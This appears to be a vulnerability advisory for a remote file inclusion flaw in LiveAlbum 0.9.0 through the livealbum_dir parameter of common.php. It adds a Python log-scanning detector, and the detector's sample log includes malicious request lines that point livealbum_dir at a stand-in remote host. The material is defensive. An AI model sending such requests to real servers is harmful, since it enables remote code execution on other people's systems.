Vendor: LiveAlbum
By: S.W.A.T.
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: LiveAlbum
Affected Version From: 0.9.0
Affected Version To: 0.9.0
Patch Exists: YES
Related CWE:
CPE:
Platforms Tested:
2007
LiveAlbum 0.9.0 Remote File Inclusion Vulnerability
The LiveAlbum 0.9.0 application is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by injecting a malicious URL in the livealbum_dir parameter in the common.php file, which allows them to include and execute remote files, potentially leading to arbitrary code execution.
Mitigation:
The vendor has released a patch for this vulnerability. Users are advised to update to LiveAlbum version 0.9.1 or later to mitigate this issue.
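Until every install is confirmed to be on the patched release, web server access logs can be reviewed for requests matching the description above. The following is an added example, not code from LiveAlbum or from the advisory's author; the log format (common/combined), the `/gallery/` path, the IP addresses and the `example.invalid` host are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line of a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Values that point an include outside the local tree: scheme:// (URL or
# stream wrapper), data:, protocol-relative //host, or a UNC \\host path.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|data:|//|\\\\)", re.I)

def flag_request(line):
    """Return the decoded livealbum_dir value when the line is a request to
    common.php carrying a remote-looking livealbum_dir, otherwise None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/common.php"):
        return None
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key != "livealbum_dir":
            continue
        # parse_qsl already decoded once; decode again for double-encoding.
        decoded = unquote(value)
        if REMOTE.match(decoded):
            return decoded
    return None

def scan(lines):
    """Return (line_number, value) for every flagged entry."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = flag_request(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample log: documentation IPs, the /gallery/ path and the
# example.invalid host are made up for this example.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2007:10:00:00 +0000] "GET /gallery/common.php?livealbum_dir=http%3A%2F%2Fexample.invalid%2F HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2007:10:01:00 +0000] "GET /gallery/common.php?livealbum_dir=./ HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2007:10:02:00 +0000] "GET /gallery/index.php?album=1 HTTP/1.1" 200 2048',
    '203.0.113.5 - - [01/Jan/2007:10:03:00 +0000] "GET /gallery/common.php?livealbum_dir=ftp%253A%252F%252Fexample.invalid%252F HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: livealbum_dir={value}")
```

The check only sees what the access log records (the request line), so it complements the upgrade to 0.9.1 rather than replacing it.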